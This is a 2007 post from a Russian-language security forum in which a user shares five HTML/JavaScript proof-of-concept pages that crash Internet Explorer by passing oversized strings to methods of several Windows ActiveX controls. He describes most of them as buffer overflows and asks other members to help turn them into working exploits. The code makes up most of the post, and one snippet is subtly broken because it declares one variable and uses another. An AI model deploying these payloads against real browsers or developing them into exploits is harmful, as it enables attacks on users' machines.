HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу ActiveX bugs
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

ActiveX bugs
  #1  
Старый 16.07.2007, 14:58
4nob1oz
Познающий
Регистрация: 09.07.2007
Сообщений: 42
Провел на форуме:
88752

Репутация: 72
По умолчанию ActiveX bugs
Нашёл несколько багов в ActiveX компонентах, пробовал как то баги задействовать но знаний не хватает для полной реализации. Все кроме последнего вроде как buff overflow, а последний просто DoS. Может ктото посмотрит и попробует задействовать и если нельзя задействовать то напишите почему нельзя, а то я уже всю голову сломал Вот баги:

MozCtlx.dll

Код:
<html>
<body>
<object classid="clsid:{1339B54C-3453-11D2-93B9-000000000000}" id=test></object>
<script language="javascript">
var b = 'AAAA';
while (buff.length <= 500000) buff+=buff;
test.Navigate(buff,0,0,0,0);
</script>
</body>
</html>
Этот баг должен работать у всех так как этот кмопонент лежит в system32 по умолчанию.

Shimgvw.dll

Код:
<html>
<body>
<object classid="clsid:{50F16B26-467E-11D1-8271-00C04FC3183B}" id=test></object>
<script language="javascript">
var buff = 'AAAA';
while (buff.length <= 6900000) buff+=buff;
test.ShowFile(buff,0);
</script>
</body>
</html>
Этот тоже вроде должен у всех работать так как лежит в папке help где установлена винда.

TShoot.dll

Код:
<html>
<body>
<object classid="clsid:{37536094-0A44-11D3-854B-004005506310}" id=test></object>
<script language="javascript">
var buff = 'AAAA';
while (buff.length <= 6900000) buff+=buff;
test.SetPair(buff,buff);
</script>
</body>
</html>
Код:
<html>
<body>
<object classid="clsid:{37536094-0A44-11D3-854B-004005506310}" id=test></object>
<script language="javascript">
var buff = 'AAAA';
while (buff.length <= 690000) buff+=buff;
test.NotifyNothingChecked(buff);
</script>
</body>
</html>
Код:
<html>
<body>
<object classid="clsid:{37536094-0A44-11D3-854B-004005506310}" id=test></object>
<script language="javascript">
var buff = 'AAAA';
while (buff.length <= 6900000) buff+=buff;
test.setLocale2(buff);
</script>
</body>
</html>
А этот баг я думал сначала что в результате переполнения возникает, а оказалось что если подставить buff.length <= 1 то IE всё равно падает. Так что это вроде как прото DoS

VsWizard.dll

Код:
<html>
<body>
<object classid="clsid:{D4D285DD-2447-11D7-8BF6-00B0D03DAA06}" id=test></object>
<script language="javascript">
var buff = 'AAAA';
while (buff.length <= 6900000) buff+=buff;
test.InsertItem(buff,0);
</script>
</body>
</html>
Посмотрите у кого будет время баги и скажите можно ли чтото реализовать с помощью них или нет, а то у меня не получилось ничегою.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В Windows Vista появится инсталлятор ActiveX Dracula4ever Мировые новости. Обсуждения. 0 22.06.2006 18:44
Microsoft опубликовала патч, который сильно усложнил использование ActiveX компонент D1mOn Мировые новости. Обсуждения. 9 03.04.2006 23:11
ActiveX and IE bugs (да блин! я всех спрашивал!) andlog6 Болталка 10 23.06.2005 12:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ